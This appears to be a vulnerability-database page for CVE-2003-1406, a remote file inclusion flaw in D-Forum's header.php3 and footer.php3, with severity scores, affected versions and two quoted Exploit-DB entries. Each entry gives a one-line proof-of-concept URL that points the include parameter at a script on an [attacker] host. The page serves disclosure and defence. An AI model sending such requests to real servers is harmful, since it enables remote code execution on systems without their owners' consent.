CVE-2003-1406
published 2003-12-31CVE-2003-1406: PHP remote file inclusion vulnerability in D-Forum 1.00 through 1.11 allows remote attackers to execute arbitrary PHP code via a URL in the (1) my_header…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.53%
82.9th percentile
PHP remote file inclusion vulnerability in D-Forum 1.00 through 1.11 allows remote attackers to execute arbitrary PHP code via a URL in the (1) my_header parameter to header.php3 or (2) my_footer parameter to footer.php3.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adalis_infomatique | d_forum | — | — |
| adalis_infomatique | d_forum | — | — |
| adalis_infomatique | d_forum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
D-Forum 1 - 'header' Remote File Inclusion
exploitdb·2003-02-18
CVE-2003-1406 D-Forum 1 - 'header' Remote File Inclusion
D-Forum 1 - 'header' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/6879/info
D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts.
Under some circumstances, it is possible for remote attackers to influence the include path for the header and footer files to point to an external file on a remote server by manipulating some URI parameters.
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
Exploit-DB
D-Forum 1 - 'footer' Remote File Inclusion
exploitdb·2003-02-18
CVE-2003-1406 D-Forum 1 - 'footer' Remote File Inclusion
D-Forum 1 - 'footer' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/6879/info
D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts.
Under some circumstances, it is possible for remote attackers to influence the include path for the header and footer files to point to an external file on a remote server by manipulating some URI parameters.
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0072.htmlhttp://www.securityfocus.com/bid/6879https://exchange.xforce.ibmcloud.com/vulnerabilities/11342http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0072.htmlhttp://www.securityfocus.com/bid/6879https://exchange.xforce.ibmcloud.com/vulnerabilities/11342
2003-12-31
Published